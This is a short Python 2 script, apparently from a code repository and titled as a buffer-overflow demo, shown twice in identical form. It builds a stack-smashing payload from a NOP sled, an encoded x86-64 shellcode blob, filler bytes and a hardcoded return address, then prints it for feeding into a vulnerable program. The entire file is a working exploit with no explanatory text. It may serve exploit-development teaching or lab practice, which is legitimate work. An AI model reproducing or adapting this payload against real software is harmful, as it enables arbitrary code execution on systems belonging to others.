saibikalpa/bof_demo_exploit.py

## bof_demo_exploit.py
from struct import pack

payload_len = 616
nop = "\x90"*300
rip = 0x00007fffffffdefc

buf =  ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\x4b\x39\x49\xc0\x26\xc4\xb7"
buf += "\x43\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x21\x10\x11\x59\x4c\xc6\xe8\x29\x4a\x67\x46\xc5\x6e"
buf += "\x53\xff\xfa\x49\x39\x58\x9c\x59\xc4\xb7\x42\x1a\x71"
buf += "\xc0\x26\x4c\xd4\xed\x29\x61\x61\x46\xc5\x4c\xc7\xe9"
buf += "\x0b\xb4\xf7\x23\xe1\x7e\xcb\xb2\x36\xbd\x53\x72\x98"
buf += "\xbf\x8c\x0c\x6c\x29\x50\x27\xef\x55\xac\xb7\x10\x03"
buf += "\xb0\xae\x92\x71\x8c\x3e\xa5\x44\x3c\x49\xc0\x26\xc4"
buf += "\xb7\x43"


buf_len = len(buf)
nop_len = len(nop)
padding = "A"*(payload_len-nop_len-buf_len)

payload = nop + buf + padding + pack("<Q", rip)

print payload
	from struct import pack

	payload_len = 616
	nop = "\x90"*300
	rip = 0x00007fffffffdefc

	buf = ""
	buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
	buf += "\xef\xff\xff\xff\x48\xbb\x4b\x39\x49\xc0\x26\xc4\xb7"
	buf += "\x43\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
	buf += "\x21\x10\x11\x59\x4c\xc6\xe8\x29\x4a\x67\x46\xc5\x6e"
	buf += "\x53\xff\xfa\x49\x39\x58\x9c\x59\xc4\xb7\x42\x1a\x71"
	buf += "\xc0\x26\x4c\xd4\xed\x29\x61\x61\x46\xc5\x4c\xc7\xe9"
	buf += "\x0b\xb4\xf7\x23\xe1\x7e\xcb\xb2\x36\xbd\x53\x72\x98"
	buf += "\xbf\x8c\x0c\x6c\x29\x50\x27\xef\x55\xac\xb7\x10\x03"
	buf += "\xb0\xae\x92\x71\x8c\x3e\xa5\x44\x3c\x49\xc0\x26\xc4"
	buf += "\xb7\x43"


	buf_len = len(buf)
	nop_len = len(nop)
	padding = "A"*(payload_len-nop_len-buf_len)

	payload = nop + buf + padding + pack("<Q", rip)

	print payload